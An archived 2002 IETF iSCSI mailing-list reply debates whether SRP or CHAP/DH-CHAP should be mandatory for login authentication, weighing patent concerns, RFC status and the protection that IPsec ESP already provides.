|
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index] RE: iSCSI:SRPOn Wed, 3 Apr 2002, Paul Koning wrote: > Excerpt of message (sent 3 April 2002) by Black_David@emc.com: > > > They asked us to "consider" DH+Chap but it was not a hard requirement, you > > > told us that they would accept Chap, but wanted us to consider a way to > > > make it more secure. I think the work that has been done, is clearly > > > considering it, and with the combination of SRP and current Chap clearly > > > meets requirements. > > Wasn't that "consider DH+CHAP" in the context of the possible need to > drop SRP down to optional and make CHAP mandatory? Yes, but that need hasn't gone away. > > That work is not complete. There are at least two technical explanations > > missing that have to go into the iSCSI specification in order to > > pursue this course of action: > > > > (1) Why is CHAP by itself not sufficient? > > (2) Why is SRP preferable to DH-CHAP? > > > > The second one is crucial as it is the justification to the IESG that > > technology potentially subject to patents needs to be used in preference > > to unencumbered technology. > > I thought the answers to both are obvious already. > > 1. CHAP is vulnerable to certain attacks that SRP does not suffer > from, and is one-way. Are these concerns strong enough to warrant using patented technologies? While I gather it wasn't always so, IPsec is now the primary form of security for iSCSI connections. Whatever login method is chosen, it will (should) be happening in an ESP-protected channel. ESP will be set up before iSCSI login. That limits who can perform the attacks CHAP is vulnerable to to persons with some level of trust on the involved machines. If someone can snoop clear text which is usually protected by ESP (i.e. they are root on an endpoint), then what method we choose doesn't really matter; the attacker could just snoop the process's memory and find the clear text password used for the authentication. > 2. DH-CHAP had not been specified yet, while SRP is a published RFC. > > Why isn't (2) sufficient? Surely, when we're trying to go through the > RFC publication process, we can't be expected to consider a proposal > that is not yet at the "draft 00" stage as a prime contender, can we? > Otherwise no one could ever finish. The concerns over SRP involve IPR, which is a seperate question from being an RFC. > Is there any consensus that iSCSI Last Call should wait for DH-CHAP > Last Call? Yes. Take care, Bill
Home Last updated: Thu Apr 04 12:18:18 2002 9490 messages in chronological order |